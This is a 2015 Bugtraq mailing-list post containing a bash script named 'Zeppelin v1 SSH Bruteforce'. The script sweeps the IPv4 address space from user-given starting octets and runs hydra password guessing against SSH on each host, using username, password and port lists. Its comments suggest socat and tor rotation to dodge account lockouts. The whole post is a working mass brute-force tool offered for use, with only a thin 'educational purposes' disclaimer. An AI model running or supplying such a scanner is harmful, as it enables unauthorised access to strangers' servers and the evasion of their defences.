
Date: Fri, 24 Apr 2015 12:25:34 GMT
From: lem.nikolas@...il.com
To: bugtraq@...urityfocus.com
Subject: SSH Network Security Assessment utility - Zeppelin -  -=[Advanced
 Information Security Corp]=-

 #!/bin/bash
 #
 ################################################
 # -=[Advanced Information Security Corp]=- ##
 ################################################
 #   Keeping things simple!
 #
 #
 #   An adjacent SSH Network Security Assessment utility - Zeppelin v1 
 #
 #   This is proprietary source code material of Advanced Information Security Corporation. 
 #   Usage, distribution and modifications are pursuant to our terms of agreement.   
 #     
 #    
 #   Copyright (c) 2009-2015, Advanced Information Security Corporation as represented by the 
 #   author of this software. 
 #   All rights reserved. 
 #   
 #   
 #   This script is for educational purposes, or for the sole purpose of academic research. 
 #   This work is copyright protected. You may not, copy, or distribute 
 #   or use this in any other way, without prior authorisation. This work is covered by DMCA and 
 #   other applicable intellectual property laws. If you do not accept this agreement, please  
 #   do not use.  
 #
 # list of usernames in username.lst
 # list of passwords in wordlist.lst 
 # list of ports to scan in portnumber.txt
 # for sem parallel check www.gnu.org/s/parallel
 # to prevent account lockouts you can use # socat+tor with refresh intervals to replicate. 
 #
 #
 # ./zep.sh x x x x

 OLDIFS=$IFS
 IFS=$'\n';
 set -f
 echo " ~ Zeppelin v.1 SSH Bruteforce ~ "
 echo " _..--=--..._ "
 echo " .-' '-. .-. "
 echo " /.' '.\/ / "
 echo " |=- -=| ( "
 echo " \'. .'/\ \ "
 echo " '-.,_____ _____.-' '-' "
 echo " [_____]=8 "
 echo " "
 echo "-----------------------------------"
 echo "-=[Advanced Information Security]=-"
 echo "-----------------------------------"
 for ((x = $1; x < 255; x++));
 do
 for ((y = $2; y < 255; y++));
 do
 for ((z = $3; z < 255; z++));
 do
 for ((f = $4; f < 255; f++));
 do
 for a in $(cat username.lst);
 do
 for e in $(cat wordlist.lst);
 do
 for p in $(cat portnumber.txt);
 do
 class=$x.$y.$z.$f
 parallel=40
 hydra=`hydra -l "$a" -P "$e" -t 7 -w 5 -s "$p" -f "$class" ssh & `
 #hydra=`sem -j "$parallel" hydra -l "$a" -P "$e" -t 7 -w 5 -s "$p" -f "$class" ssh`
 echo " [~] ~ Attacking $x.$y.$z.$f with username: $a password: $e"
 $hydra
 done;
 wait
 done;
 done;
 done;
 done;
 done;
 done

 IFS=$OLDIFS
 set +f

